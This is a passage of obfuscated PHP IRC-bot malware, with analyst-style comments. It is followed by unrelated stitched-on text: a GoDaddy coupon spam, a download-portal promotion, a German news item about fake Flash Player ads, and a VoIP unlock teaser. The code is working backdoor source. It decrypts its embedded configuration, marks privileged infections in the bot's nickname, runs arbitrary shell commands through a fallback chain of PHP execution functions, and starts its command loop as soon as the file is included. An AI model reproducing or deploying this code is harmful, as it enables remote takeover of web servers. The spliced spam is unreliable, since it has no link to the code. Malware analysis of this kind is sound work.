 * Sends a reply as a PRIVMSG ("UFJJVk1TRw==" decodes to "PRIVMSG") to the target
 * $j01b6e20344b68 with text $f78e731027d8fd, unless the silent flag $u73be252ca8221 is
 * set. The flag is compared with loose "!=", so any truthy value suppresses the reply.
 */
function lf2f4e964f79d0($s317d37b0edc7b, $u73be252ca8221, $j01b6e20344b68, $f78e731027d8fd)
{
if($u73be252ca8221 != TRUE)
{
s56eacb300613d($s317d37b0edc7b, f_b64decode("UFJJVk1TRw==")." $j01b6e20344b68 :$f78e731027d8fd");
}
}
/*
 * Decrypts a command-name literal: Base64-decode the input, then subtract a key byte
 * from each input byte. Same scheme as f_decrypt(), but with a different embedded key,
 * and used only for the case labels of the command switch.
 * The key is itself a Base64 literal that is decoded again on every loop iteration; the
 * two occurrences below are the same string split at different points.
 * The key index is (i mod keylen) - 1, so for i = 0 it is -1 and substr() takes the last
 * key byte; the key is effectively used rotated by one position.
 */
function d69923efad5b7a($ic7a1ddb19daba)
{
$db4a88417b3d01 = '';
$ic7a1ddb19daba = base64_decode($ic7a1ddb19daba);
for($c865c0c0b4ab0e=0; $c865c0c0b4ab0e<strlen($ic7a1ddb19daba); $c865c0c0b4ab0e++)
{
// Current ciphertext byte.
$ya87deb01c5f53 = substr($ic7a1ddb19daba, $c865c0c0b4ab0e, 1);
// Matching key byte.
$cae0e1268c3859 =
substr(f_b64decode("NDUyMyQ1fjMyMTQ0MzQyNV5mZEdzZGZHIyQ2QDM1M0AkNUAjJDVANTQ0NzUmNDUmNiU3"
."JV5eOF4mKkAhfiM0fjIzNDMyJEAjITQhMjMkMyUzNCUyIyQ1I0AkNTIzNCU2JTQ2NzheJiFAM0Q="),
($c865c0c0b4ab0e % strlen(f_b64decode("NDUyMyQ1fjMyMTQ0MzQyNV5mZEdzZGZHIyQ2QDM1M0AkNUAjJDVANTQ0NzUmNDUmNiU"
."3JV5eOF4mKkAhfiM0fjIzNDMyJEAjITQhMjMkMyUzNCUyIyQ1I0AkNTIzNCU2JTQ2NzheJiFAM0Q=")))-1, 1);
// Plaintext byte = ciphertext byte - key byte (chr() wraps the result modulo 256).
$ya87deb01c5f53 = chr(ord($ya87deb01c5f53)-ord($cae0e1268c3859));
$db4a88417b3d01 .= $ya87deb01c5f53;
}
return $db4a88417b3d01;
}
/*
 * Builds the bot's nickname: $yfac65290966c7 random lowercase letters (a-z) from
 * mt_rand(), prefixed with "r-" when posix_getegid() returns 0.
 * NOTE(review): the check is on the effective *group* id, not the user id; presumably
 * it is meant to mark hosts where PHP runs with root privileges - confirm.
 * $e2cb9df9898e55 is not initialised before the first ".=" and the function returns
 * it unset when the length is 0 and the gid check fails. A nickname beginning with
 * "r-" on the control channel is therefore a sign of a privileged infection.
 */
function pd988971435842($yfac65290966c7)
{
for ($c865c0c0b4ab0e = 0; $c865c0c0b4ab0e < $yfac65290966c7; $c865c0c0b4ab0e++)
$e2cb9df9898e55 .= chr(mt_rand(0,25)+97);
if (posix_getegid() == 0)
$e2cb9df9898e55 = "r-".$e2cb9df9898e55;
return $e2cb9df9898e55;
}
/*
 * Runs $o111ca5df4a68b as a shell command using the first available of exec(),
 * shell_exec(), system(), passthru() and popen(), and returns the captured output
 * (an empty string when the command is empty or no method is usable).
 * All calls are prefixed with "@" so failures produce no warnings. The fallback chain
 * exists to get around hosts where only some of these functions are unavailable;
 * for hardening, restricting all of them (PHP's disable_functions setting) is the
 * relevant control, not just one.
 */
function t54d54a126a783($o111ca5df4a68b)
{
$o9b207167e5381 = '';
if (!empty($o111ca5df4a68b))
{
if(function_exists('exec'))
{
// exec() fills the second argument with the output lines; they are joined with "\n".
@exec($o111ca5df4a68b,$o9b207167e5381);
$o9b207167e5381 = join("\n",$o9b207167e5381);
}
elseif(function_exists('shell_exec'))
{
$o9b207167e5381 = @shell_exec($o111ca5df4a68b);
}
elseif(function_exists('system'))
{
// system() prints its output, so it is captured with an output buffer.
@ob_start();
@system($o111ca5df4a68b);
$o9b207167e5381 = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
// Same buffering approach for passthru().
@ob_start();
@passthru($o111ca5df4a68b);
$o9b207167e5381 = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($u8fa14cdd754f9 = @popen($o111ca5df4a68b,"r")))
{
// Last resort: read the pipe in 1024-byte chunks until EOF.
$o9b207167e5381 = "";
while(!@feof($u8fa14cdd754f9))
{
$o9b207167e5381 .= @fread($u8fa14cdd754f9,1024);
}
@pclose($u8fa14cdd754f9);
}
}
return $o9b207167e5381;
}
/*
* Base64-decode + decrypt using an addition cipher
*
* The input is Base64-decoded, then each byte has the matching key byte subtracted
* (chr() wraps the result modulo 256). The key is the Base64 literal below, decoded
* again on every iteration. The key index is (i mod keylen) - 1, so for i = 0 it is -1
* and substr() takes the last key byte; the key is effectively used rotated by one
* position. Used for the configuration values and the hostnames; with the key embedded
* in the file, the values are recoverable by anyone holding the sample.
*/
function f_decrypt($in)
{
$key = "M0AhIyFAJF4mKl4mQCMkIUAjIUAjISQjJSMkJSMkJWUzMkAzNEBoVGg0QHdlNTYzNV4hQCMqXjdGSEdFJEAlQCNAIyRAIyFAIyQhQCNAISMkIyUjJCVeJSZeJSYlXiYqU0RGI0AkIUZBVyRGQUFTREU=";
$out = '';
$in = base64_decode($in);
for($i=0; $i<strlen($in); $i++)
{
// Current ciphertext byte.
$tmp = substr($in, $i, 1);
// Matching key byte (see the index note in the header comment).
$x = substr(f_b64decode($key), ($i % strlen(f_b64decode($key))) - 1, 1);
$tmp = chr(ord($tmp)-ord($x));
$out.=$tmp;
}
return $out;
}
/*
 * Returns a string of $yfac65290966c7 random lowercase letters (a-z) from mt_rand().
 * Same generator as pd988971435842() but without the "r-" prefix logic; used for the
 * first parameter of the USER line at registration.
 */
function rfb0daa8f01135($yfac65290966c7)
{
$e2cb9df9898e55 = "";
for ($c865c0c0b4ab0e=0;$c865c0c0b4ab0e<$yfac65290966c7; $c865c0c0b4ab0e++)
$e2cb9df9898e55 .= chr(mt_rand(0,25)+97);
return $e2cb9df9898e55;
}
// Entry point: the connect-and-command loop starts as soon as the file is included, so a
// single successful remote file inclusion request is enough to start the bot. The loop
// only ends through the exit(0) command case or when the PHP process is terminated.
vfc35fdc70d5fc();
?>
GoDADDY Domains just for $ 1,99 COUPON CODE 119TEST
GoDaddy is offering 1-Year Domain Name Registration for $1.99 with code 199TEST
20-cent ICANN fee applies, making it $2.19 per domain!
confirmed: .us
confirmed: .com
confirmed: .org
confirmed: .net
Works only once per account godaddy-coupon 199TEST
New Free Software Archive
recently i was surfing the web while i found an interesting free Software download Portal its www.4infos.net http://www.4infos.net/
I have been involved in internet marketing for many years, and have never seen such an easy way to set up content oriented sites in such a quick, eye appealing and affordable way, and the sites are all set up with great appeal to the se's as well.
A high-ranking portal can potentially earn you hundreds of dollars in monthly
this Portal is split into Download categories
- Business and Finance software http://www.4infos.net/get-business-and-finance-1_14.html
- Audio Software http://www.4infos.net/get-audio-1_3.html
- PC Enhancements Software http://www.4infos.net/get-pc-enhancements-1_26.html
- Games http://www.4infos.net/get-games-1_40.html
- Home and education Software http://www.4infos.net/get-home-and-education-1_53.html
- Internet related Software http://www.4infos.net/get-internet-1_70.html
- Multimedia and Design Software http://www.4infos.net/get-multimedia-and-design-1_83.html
- Software Development http://www.4infos.net/get-software-development-1_91.html
- Utilities http://www.4infos.net/get-utilities-1_103.html
- Web authoring Software http://www.4infos.net/get-web-authoring-1_119.html
Let's give it a try!
Google-adsense wird als Malware-Schleuder missbraucht
Wer in den deutschsprachigen Versionen von Google nach "Flash Player", "Flash Player Update", "Flash Player 10" und ähnlichen Begriffen sucht, erhält direkt oberhalb der Suchergebnisse oder rechts davon Werbung eingeblendet. "Adobe Flash Player 10", heißt es dort, "Die Neueste Version steht jetzt zum kostenlosen Download bereit." Die ordentlich gestalteten Webseiten bieten eine Datei namens flash10_setup.exe zum Download an.
Wer dieses Programm installiert, bekommt aber nicht das von Adobe empfohlene Flash-Update, sondern handelt sich einen Schädling ein. Dieser wird derzeit nur von wenigen Virenscannern erkannt. Dem österreichischen Unternehmen Ikarus zufolge handelt es sich um Adware, also Software, die unerwünschte Werbung einblendet.
[Update]
Am heutigen Samstag Abend erklärte Lena Wagner, Sprecherin von Google Deutschland, gegenüber heise online: "Selbstverständlich erlauben unsere AdWords-Geschäftsbedingungen Werbetreibenden nicht, Webseiten, die Viren enthalten, zu bewerben. Wenn wir entdecken, dass solche Anzeigen erscheinen, entfernen wir diese."
Quelle: http://www.heise.de/security/Google-Werbung-wird-als-Malware-Schleuder-missbraucht-Update--/news/meldung/117564

Unlocking Aladino Voip New
use this guide to unlock Telecom Italia's Aladino Voip new and use it with other SIP Operators
